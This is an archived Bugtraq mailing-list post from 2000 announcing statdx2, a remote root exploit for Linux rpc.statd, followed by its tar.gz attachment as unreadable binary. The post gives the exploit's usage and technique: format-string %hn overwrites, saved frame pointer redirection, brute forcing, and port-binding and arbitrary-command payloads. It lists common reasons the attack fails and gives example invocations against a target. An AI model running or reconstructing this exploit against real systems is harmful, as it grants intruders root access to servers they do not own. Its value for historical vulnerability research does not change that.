5575838 2000-10-11  06:08  /110 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <13210>
Ärende: statdx2 - linux rpc.statd revisited
------------------------------------------------------------
Hi.

I know this is getting old and boring now, but a lot of bugtraq
readers have sent me reports of problems experienced when auditing
their systems, and others have asked questions regarding the code's
usage. Because of the number of these emails, I decided to take down
statdx from its dusty shelf and remold it into something that will
give more bang for the buck.

You know the drill -- use only in an ethical manner, don't destroy
valuable information, even domains five levels deep at the bottom of
the global interest hierarchy don't need a tagged HTML facelift, etc.

Attached is statdx2.tar.gz. It contains the following two files:

* gdb.txt   - how to get addresses with gdb (requested often)
* statdx2.c - the exploit itself (bug fixes, new stuff)

In another instance of keyboard diarrhea, here's the new introduction:

/**
*** statdx2 (the successor of statdx)
*** Linux rpc.statd remote root exploit
*** by ron1n <shellcode@hotmail.com>
*** October 10, 2000
***
*** $ ./statdx2 -h
***
*** This version supersedes my original release. The reason I chose to
*** resurrect this stale exploit is so the new incarnation would contain
*** many improvements over the first version.
***
*** There are major changes in the algorithm used in the exploit buffer
*** construction. The format string now uses "%hn" to eradicate several
*** rare but possible problems. I didn't know about the "$" trick when I
*** wrote statdx. Even though it seems to be the new trend, I decided to
*** ignore it for this particular exploit. An additional payload has been
*** added to allow remote execution of arbitrary commands. This should help
*** when the port-binding code can't be used.
***
*** There is now primitive brute forcing code which slightly increases
*** your chances of a successful exploitation against any vulnerable i386
*** distribution of Linux. In order to implement this, the attack strategy
*** had to be altered. A progressive brute force climb down the stack to
*** hit the correct address of the saved return address will cause problems
*** when the saved frame pointer is overwritten. Instead, an overwrite of
*** the saved frame pointer is used to cause redirection in the parent
*** epilog code (see phrack-55). This is much safer to use for brute
*** forcing and has the side benefit of being an alternative avenue of
*** attack when the usual target address contains a null byte. The null
*** byte truncation problem still exists when brute forcing though, so
*** use common sense.
***
*** The information below is based on numerous questions I receive.
***
*** common reasons for failure
*** --------------------------
*** o   Confusing statd with rstatd.
*** o   Attacking an architecture that isn't i386.
*** o   Attacking an operating system that isn't Linux.
*** o   Attacking a different distribution of Linux with the
***     default Redhat exploitation variables.
*** o   Attacking a system whose statd has crashed because of
***     previous exploitation attempts, successful or not.
***     The portmapper will still advertise statd even though
***     it will remain dead until restarted.
*** o   Attacking a patched system or a system with stack
***     protection. Stack protection will defeat this exploit.
***     I have seen a way to deliver the shellcode elsewhere
***     using a different procedure call, but I am not going
***     to steal that idea.
***
*** important notes
*** ---------------
*** o   The attack may be logged in syslog target locations.
*** o   Statd is a standalone service; be careful. Brute
***     forcing can be fatal. In fact, it's highly probable
***     that it will be fatal. The brute force mode exists
***     only to introduce a behavior-based form of blind
***     debugging with crashes mapping stack frames. This is
***     very difficult to do and it requires patience, but
***     it can be done.
*** o   The nature of the vulnerability provides no means
***     to examine the stack remotely, afaik. If anyone
***     wants to drop me a free clue about this, email me.
***
*** dotslash examples
*** -----------------
*** # default Redhat attack
*** $./statdx2 -d0 target
*** # default Redhat attack; new payload
*** $./statdx2 -d0 -c "touch /blah" target
*** # saved ebp overwrite (used automatically when desirable)
*** $./statdx2 -a 0xbffff2fc -f target
*** # brute force mode -- 50 iterations (-f option implied)
*** $./statdx2 -a 0xbffff004 -n 50 -s 20 target
***
**/






_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.
(5575838) ------------------------------------------(Ombruten)
Kommentar i text 5575839 av Brevbäraren (som är implementerad i) Python

5575839 2000-10-11  06:08  /22 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <13211>
Kommentar till text 5575838 av Brevbäraren (som är implementerad i) Python
Ärende: Bilaga (statdx2.tar.gz) till: statdx2 - linux rpc.statd revisited
------------------------------------------------------------
‹^“ã9statdx2.tarì[{WÛH–ïן¢Ú=$6±ôÄ™á4,83Ýr|d©d+‘%·J3}òÝ÷wo•^Æ8a²;{öìºÛXªª{ë¾%eâŽ;É"ùá¿óÓµ¬½^Oü Dw·[þåÏÎÎþžûݽýýnw·»‹énÏÚÿAX?ü>©JìXˆ”=³eððº¯Íÿ/ýl~ߧvñËÉo-ñrðæâr ~»x/^_ˆá_O¯Zbp~õcÿžÅÕðdøZœ^‰Ë÷çç§ç©5°ôéٙøûÉùPœò‚ËáàµÀڗC1<};ââ
0ø¾)jßKíObâŽEûwÑn˅tŽ¶ÔØ·â¹Ó$n­é¦PSb'Š¹k÷ùs³ÂNۙ
=tÂ7~8I$æq4‰íÙ¡XBÝï|×â8ŠE,m—€4.é¨#•zª„º›£@x~ ;µúVªâ­ rì`‹PÖ…c‡OF`–ªCqª„-\?–NÅwÚ¥Ao/Žfb+ðÇôQQg¯Óé¸Q(×®uہ¦Z¿ý-ëýq¨Ôˆ(W„	}5ÒÇA´ºû¨=I•>"–*
nªÖ¢gYÎnw_
?£‘’
t$ÍU*1öDögq£Ây쇉W{I÷ó×¢ƒŒsÏÙsz‡l%ÅҎÓИ]ë óÝþròf8¸d·¾Ù_^N~ywqz>liWˆ7gg‡W‹7—o ފíÃڟDg‹M±-Ú6‘ÜÕÿ	¶åi¤’ï¦OKË©½ŠÂf
½tjaµJ¢bñŸ^ŒrY‰†Jp19²cë 'ž^oo[OŋXÎ¥(±mY"ñgRC¡-Q£„5³ºÖv¯%¼(žÙ	P<·zcÏ9õ‰Lˆ¹ñ]hϤììX%6T½%ìx¢²ýzvBIYy‡PÛ÷Je³vzΊ9yyñ·üzòöÝـ$‘s‰HÌ^¿¾\]	ŒÏˆÀß¿;Xø·2Kâ<*E¸dK… JQJ+ð÷ÔOjé̢§ð•ˆÓ0$}
ñï˜vxwk߉†ºÂ•}ý¤ù³hÜÆ°)îj¯e‡Ù±¾%ÿðþc<´ãüÕ;=«gQý·oíw­½îÕ{½ÿ¯ÿþ%Ÿ-8,œVd‘º‘À
á­T‰À±P
é™&¯:£Z ¨‰P‚Ì¢DŠ8Š!ó ò9¦‹ñÆÂn(^p-åD®üó4Jf¶tœhv̋.Æ2F¦jQ˜µh'*™cš§72V~‚Ä9®¤+•˜Qð'~h (¶’AÑy@aé©p%ª3FƒÆ€DB±¢’!žŠÉ ”·HŽ‡vBÞFià
‰ÆöCF4CLþqæFÎdˆd‹˜=?VIFk§ÄŒ%R€ì'HיÚá 1”LÀH2‰œe£iãÔódÌx@2WêašU…„Îg"Œn	…õiX§²TƨZºRdف‘2N1”òÇ
`üÌTRs}—ÊÌτÍGiÂäÔÿ„±ï|·S	á2¢Û˜Ì@ë¬#7’HÒ	iì„DÄXæ’Mb"céø.˜5Êñ'ašE“4·ãÄwÒ^jDÑ'¡°]×'þ¡ô¹}D¨…§¶ÂRkóŒR
À€±TªúSÖ',ێÇ~ÜA 3hÓUmdjÊʆéÎ5{S©u1â¤l Yµ)ÅÁ©lYÓ@EÂC&œÖÈ:NV–“#¸úÈe*ð'Ó$¸#“#³•ŠÑÜE©¶¸#Sœ¹¦—™4´yÚ˜¥â<)nÒ „ŽIŸþÎó=Æäúdãœwödh7±KV‘)lÈ,÷–6IjN>“]Áv&wŒjj»F›v€MúÐÙ„U¹„|6nt«¨QöÔ×&åDÚ¡2BAäñZûFRˆIÒ8Ìçn}´fŽ
iç¶ZU‘†òbª½¸s¾vÍ[8W"CâZ%(ãQ…ù*1­AÂn	Öõþàœ’¨ñUØ*äÇhäÜ"£ã\@̧1xoïî6•áÿ•EÊö´)™=ˏ‘d–BUY7ӁðCéA|ÕXêZ­ Ð¦9KF‹¹ŒR•Âm÷Pªæ’5¡ÚÈ0…Çw‰‰£tkÂ:ĄÀƒ°È\
@«¤¹€)½KÕÐu,hQhe<Ä(¹Åq"\—ý²ÔьvKr^Hjl“ì1¦3G©BÑ(­Qˆ"PƒÛƒ]gÅRõ|ÒX˵ýà‡§#”%h)¼Tq§Ç©îYÄ|ÝÉqëÿ9“Œê3A`°lS6¡à@>øH„$F¹„IÎÊ`ÚCWÁÁ™)§®tkM+ÍÀôq¥g§A".¥KT"Ǎû+Ôê½a·œBµ(ȝØVth1–ÚŒ¥ÑgËŸ4T
Pp½Ù<A\)…0*Ý£¤“ƒMŒÙsHF;»6.ۅŸ&~Nƒ,rL
`Äz2˜F JÑÒUy‰\­:¸mÂ'0†WPUðM¢ä¨Uâ/J¤É½WìXň&âFó¨ÓW–³rðSÈï†ò0°55p}W~V<ä%“’·”Ir`m‘eàS#—LMuÐât~*ÐCA°b‚Ø5Ɂ±ŽÀXäS8‚?än!àLöyÈ5†Eb˜|$Dº‰®X 6
{&¶P§Ï>ZÈýŠÕçS˜XC×¢¤ßøŽì2Ô\ÆÑ/ó8HŸ<kÚàÎ(Ü8y¶“´ ü§
e2E¥¸D&]pÎó(€‰‘r²š±Ð9Œå Q°†âÈM±Ê¨Ðâ¶ŽJ®8¨J>7N'¢˜mH;B>LÛDȏSŒÊB[¸c%S哰…Dœ|:÷C¿‹&³õ%JVzÙŒˆôùSYkÈd)&Áfu‚ø	íƧz:ŒÄLÚ¡*ۍ\Ø3:U*r¸.¨‚;$QDÖÏЄGŶÌánm*Š‰ö8š'$çŒj¤¦¬¢¤Jƒü5À‚ÂÝ(Q
Æ£,Q«Ã6þ´Þ´mêV¢ÔI¸–1ËuP}.OME¹
EÛõ$¢¼½5ìi½ŠSr</Õ
.ì4‰(©‘—Þé$	aû\¦5ïmdg§5۞#Ú^u“{&Ûn‹]ŠçdBù®
h®+ˆÏ—îš-,«'Ú!ahÓyWi/|·jµŸP“)¶y¡׏:ÓãêPà—Ç¨©ŽÉ8—@ÓŽæVÇB™¸KØÐmòáMu‹;µ•ÜÍá:÷‡}Ò½Q9Ÿero3Øt²å‡4^û	A6~õvôîòâ/èK-k»WþÛàòJtË#ô`£:òöä׫áåÙà\Ðù`(_aB”0ÎìEÃn›¢Ñ°›Çqógüâ·Y«¡|›QÚpÂQÒléK*dė~M·€BÍF|Ðø5
±ØDÝÃýêÕsÜøòxŸ¢#×P5º…Õzó¾¨|¶6…%Ž2+÷ç¢/ºÅ=¬ö¢©0&Ïߟõ5l6È
…1IÉ«iîÃG€„ú™ê×9¾^l»×‹]y½Øé^/ëzñüùõ¢·w½°öK×6®®ût=ήë„Âòpk™e¸¶žK»;Å]w
(ßz—Qì淘’Å@Ɩ¾w\Šï»Å½|Î(€y^ñÝÆwo_ Ù“ú~èö@Ý®§™ÞÛÑמÇ(ÊàûÖûFؔö3aÓµØ9èî=7²ÎäK2ßw°õÆ»VqMô¤ÑE6ÖcéÖÙ©N“0H({{%!aµ­çiÛ9Z]Œ
à„j¯Ø1§€–÷ŒÚºúšÀɬ.£X¹[ïñ]0n•K£Xµœ™“z1Éò:Ðëv¼b'µÆ»«¦V;0.k¯lŒ‚ƒ¦Øt{U#!Þ+„g‘y£5âóµJæë|«ù2
	ìû÷ìɊ˵?øI	źíóŽÈzˆd›Tàêát„pBç[óHõs8Ü2l¡Xñ”Dwëž/Õ}ø"û5;þaµDÝdtÝíu¶·ö:]|­z‹M<²Óíµ„~Œ³g
ðàK+GBa+ûkåÿaÆQŒ’ڍG&ú6~}})61@ýM5.oFãOóf&O4~d8Α

ñ„–´³Èݪädƒ,üš³Æ›“³«AS‹*^¾§¡/êà˔å5M4m(jÐõ(›M^ù$”RÏj!å‰i5QW‘R–´¾BTŽ¶TEÀyîÑ,ÝD¾[K•=‘
mǨã›%3÷aܦèç^
”6¨y`ŒYÁõµ3ñë°n6¿‡â=m{(6”ø «:õÑdM¡%@žÜ=ŸÀÃ5Û´¯“@›ò! i3Ücñ!«”³¾çã:$ÉubšCnÐØ¡¯Õ}kâÌŇԝ¯…ŸƒNDºÑP$J”´QB~OÑ­…¶
­”¥ÓD}|¾NÊí°9tkU ñ‚ÄÚ}#ÀêH¥Ÿ>æ,k
o
_£!Øô6Š]n™(Ú
ú`-¬,•»ÔIQï-(tÀvׂ…»×C8Q&ÄéZP/WnQó}ÈËÁµ v½®ß/
¯ëؕNçêk1¸×	5Ùþç’ÿ¸âÅÿuJ-€3…1ÿš9Phø(|¬¾É"þÇ%'TÃϞááÊ
б¡Øór8ºhUÑdÛȅŸ4¿žGoNNÏÞ_šxb ŽÈPkðen"½=…³Œ†È)7§Ê õ½Fcª@~åuƒÃ6ő®»5ä¼Lùm„Fõ…F3“ÞCäÒø—Z90n6U)ÄTµ§|W
™qr¼kp‹.ÌÍXcfÉO´w™ßCcÔ¢ŒNÝ»•›±Nó`œÚ'z¥ ŒH7~Ølüâ™èjP%C·ÁƒÐ›ãŠ­~ Ðùoú·ý”³sÛîû.ër{ù½lýþ²øÞ¼ýÇàò¢ñ´”D†á«Áp™–Õ‹1f2Ÿ…6õ{A
Í<ÍWkV§x
s ‚0>–4º5x*J]§Ø’r
% õôj™Ø‡¶ÿCÆQƒÔñûÿt†›¥ÍÉZ¡Ph-–ÎM†øi`‰Éû;–™el÷Xý»šå%ú~}_Ûö^,x…¡9ùu‚HI·Eÿ<1|lT2'„÷f&,"ò«z[e‰ß§¿Lw¶»Œük|ðÃQvYàeç̙#?‰oPP0òfÉôqµ5ôlmY{ÃØÕÌWüF
Ô§¾W{_L¨Ì‚Ÿ3•Îgþ²‚üR„DY*Êq>Ž&(Ð\EӈK¡#1MP¼5¸7o–2ƒÐ	o5NތNÏC4¯~¡œ¼m‰Ówï./†£á«weï*$šËOcyL> Çq´dº\f•RÃâ'7¤–‰ÐÊ©_܆ÒýùǪ*ò,¢#|…v¼|â‹9×جS?påÂ$Uj:+f«ÒeÒuÖiÒ5Õ_•ò¾%>¡ÂÚr/«ÍvsžÄ•VÆ˸Jÿ:!°ÎíL·zZӄ ]i*pÑÓx4`y…¦MÏø9ÊÀÚùáb;K|ØQð3S˜Ì
³ýtÁðÖ¦>èÃÒnÖ85x¤™ÑÙ>"²
xp«÷ö8	Aä4¤&¿Ûl>d[fácl«T ù0Ûý<;ÛË[кOzÝ'½îS¹€£©èÙ3a‰¨/Ž±|S<7’(Țə3¿#>¡50Û½–è•è¦Ág$–3®ž¯£›.Šš² ~æÕ7ž/P…ìÜßfçm¶6ÍLúmÏ_èŽ+ˆæó;ègÂ/éö“Îó¥MÑ¢aìK3#‹ØBc7»*㏆¸À]lÐëDlÉ;Xí>Ý¢[?þ²<bÍ)ã׋¬Å¥è A\pöjÁqAIÓt¦ùôÚzÚÏ¥¥ßÎ^êŒm^јúŸ¨¡1ÊÍَ«Ï¼±äx¹ç>֍äžÁWÚcfMç´L—1VCXU.hBŠ›Q˜Ÿ$d+šýoÂU€›«ÖòLî¼YÂýVWPT+g8N…ØЕ:Çæ~e‰n·iÉOÁbkÃÝ2K³PŸ…ù“¡Ð*…h·5.ù÷¦­{¡][ªµW.¡Òm¢Ž°?‹z卢º8õêëMõ%DF´‡¢¬{þ9¿ŠYó|¼ÞnYÔlDìp’ÄŠ½&Á}X‡tNÛÄÍM9õ9Óå”gôóêìtp>›NÅ>`¤[>¡££Æ~¹‹¥³Šzÿà½òM\™ËŽKՌ^-M凄j¶Œ´\QÑo–ªÌÑ3|¬Ý-zK¨‚N¡òz”k:¡øTäÀPK+Gb·$ÓÃÈA1bBÁ /^B´¶eñi++(ËH…Y	x'ÂÔ}֊3r=\)‰£Ëw¯F'ç¿Qé—=ÐafŸhN{÷ËLÿ<é¬FâÖÃúº´ëí=@…•>~À|C[™âx2?´ƒÃèðöP†‡žsèNëM.ìÛÝ{iðÖOœ)°=Ô¢86Š÷§ÉÓÃB{ݾþ72ýçX¨”c‡^CóL™ešÂ}žP›k@íU 
åå'Zôë€çz·“È78ÖÁD€É-èan
cìð! 
sþF Ø)<£
…lúæäì,KšUHOkÊûš¢¬+žûìt6¸Ò%†î#‚éÓÃÊhv¤M”Ò™>Yîëc¥·^jsæAõ›ùí8ï¼÷ºÌó({ÄM}Jéøž¿|Tðõ>‹>>ºß¾•æLƒÅ‘b«rî¨?xÈÉî‘}"Tû.ßï‹×Ÿ&å®MºÔ»Óߏâ©Ÿ©Õt8+/)?4‹´K--Ê[1Q™••{&[ÚiÊKôCÅ%EWÿ½êâ ÔðÏ©VŸÀ<!$y‡lQiš.ù$À³g~pL—¿4]9(Ё®º€{qØþÜزY’Üt’›‘’¬-'Ê©ž±Š&PÇáe	QâÇ:úÁìˆ^dOdƘy«¦•½GƒÊ‰K?W-I‹J]FT>Â^‘¨Ê˜ë=L‹¹´qóñ6»T»®d-u¿Î8š½ÿ2ÆJÛ6ÿ9gDÅU¨y»¿<^h¹B	½G
“ÞBÉw5Ž.ÃËßFôo²/Þ[œ°4Å Z>›	“ö±Œì4¡j~ÒÐ_d¬ÔóZ/=fgñTj,µÛËF÷Ÿí[Ë
‚@ý
…ðŒˆ([¶‘Ö"ά
Ê¿ï¾FÇQr÷ìÄy8ÎUî9÷ŒèNìA&&ý¾ƒÀ{3œi¦®ê.ìÎӜl'[^¢iOހ˜¾`ÕÓ¢ù¶|%‘ç8Ìäø¦ôšíyÊž.Ã]é-`ǂÚ
>ê†3Àây½æEñ;º8®xAÛq…³À’¡O<4nø
v|Uœúq’ŽwEFh[£;Ê}_8¹Á­±æ¼,¾²ÀÈ“<nƒ¢ÊÿÈa¶Gƒ%¸®i۞F
DõéU'Œ7'¼5(°ÈD÷
"Òƒå3pH¬è¤
²(Þu	Ûé2ᬳeqB—Ôu#~ÈgˆŠM¾nǶ…Eí]µq ½;åðä”	ï‹,òÔô
É1(Sº"š¨'d
…B¡P(ŠÿÁê¸	P
(5575839) ------------------------------------------